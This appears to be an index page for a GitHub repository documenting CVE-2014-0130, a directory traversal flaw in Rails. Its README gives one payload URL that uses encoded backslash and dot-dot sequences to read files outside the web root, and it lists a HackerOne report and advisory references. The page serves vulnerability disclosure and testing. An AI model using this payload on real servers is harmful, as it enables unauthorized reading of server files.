https://github.com/omarkurt/cve-2014-0130

cve-2014-0130 rails directory traversal vuln
https://github.com/omarkurt/cve-2014-0130

cve-2014-0130 directory-traversal ruby

Last synced: 10 months ago
JSON representation

cve-2014-0130 rails directory traversal vuln

• Host: GitHub
• URL: https://github.com/omarkurt/cve-2014-0130
• Owner: omarkurt
• Created: 2014-05-08T14:40:36.000Z (almost 12 years ago)
• Default Branch: master
• Last Pushed: 2017-05-15T08:31:52.000Z (almost 9 years ago)
• Last Synced: 2025-05-30T16:33:36.390Z (11 months ago)
• Topics: cve-2014-0130, directory-traversal, ruby
• Language: Ruby
• Size: 28.3 KB
• Stars: 19
• Watchers: 0
• Forks: 2
• Open Issues: 0
• Metadata Files:
  • Readme: README.rdoc

Awesome Lists containing this project

README

          
== CVE-2014-0130 Test Case

Payload : http://site/api/%5C../%5C../%5C../%5C../%5C../{{CAT_DIR}}

=== Netsparker Detected :

https://i.imgur.com/s1vahmj.png

== HackerOne 

1 - newrelic.com rails directory traversal vuln by droidsec - https://hackerone.com/reports/134032

== Reference 

1. http://www.openwall.com/lists/oss-security/2014/05/06/12

2. http://blog.flowdock.com/2014/05/07/how-we-found-a-directory-traversal-vulnerability-in-rails-routes/

3. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0130

4. http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf